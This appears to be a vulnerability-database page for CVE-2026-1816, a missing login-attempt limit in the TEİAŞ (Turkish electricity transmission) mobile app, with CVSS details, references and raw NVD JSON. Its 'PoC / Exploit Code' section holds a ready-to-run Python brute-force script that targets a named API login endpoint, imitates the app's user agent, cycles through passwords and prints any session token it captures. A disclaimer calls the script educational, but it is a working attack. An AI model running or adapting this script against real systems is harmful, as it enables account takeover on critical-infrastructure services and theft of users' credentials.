CVE-2026-1816

Description

Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Brute Force. This issue affects Mobile Application: from 1.6.2 before 1.13.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

TEİAŞ Mobile Application >= 1.6.2, < 1.13

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint for authentication
TARGET_URL = "https://api.teias.gov.tr/mobile/v1/auth/login"

# Headers to mimic mobile application
HEADERS = {
    "User-Agent": "TEIAS-Mobile/1.6.2 (Android 12)",
    "Content-Type": "application/json",
    "Accept": "application/json"
}

def brute_force_attack(username, password_list):
    """
    Attempts to authenticate using a list of passwords.
    Note: This script is for educational purposes only.
    """
    print(f"[*] Starting brute force for user: {username}")
    
    for password in password_list:
        payload = {
            "username": username,
            "password": password
        }
        
        try:
            response = requests.post(TARGET_URL, json=payload, headers=HEADERS, timeout=10)
            
            # Check for successful authentication indicators
            if response.status_code == 200 and "token" in response.json():
                print(f"[+] SUCCESS! Password found: {password}")
                print(f"[+] Token: {response.json().get('token')}")
                return True
            elif response.status_code == 401:
                print(f"[-] Failed: {password}")
            else:
                print(f"[?] Unexpected status code {response.status_code} for password: {password}")
                
        except requests.RequestException as e:
            print(f"[!] Connection error: {e}")
            
    print("[*] Attack completed.")
    return False

if __name__ == "__main__":
    # Example usage with a sample password list
    target_user = "victim_user"
    passwords = ["123456", "password", "admin123", "teias2026", "userpass"]
    brute_force_attack(target_user, passwords)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-1816
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-1816
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-1816/
[4] VulDB https://vuldb.com/cve/CVE-2026-1816
[5] https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-1816", "sourceIdentifier": "[email protected]", "published": "2026-05-21T15:16:22.557", "lastModified": "2026-05-21T15:24:41.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper restriction of excessive authentication attempts vulnerability in Turkiye Electricity Transmission Corporation (TEİAŞ) Mobile Application allows Brute Force.\n\nThis issue affects Mobile Application: from 1.6.2 before 1.13."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0286", "source": "[email protected]"}]}}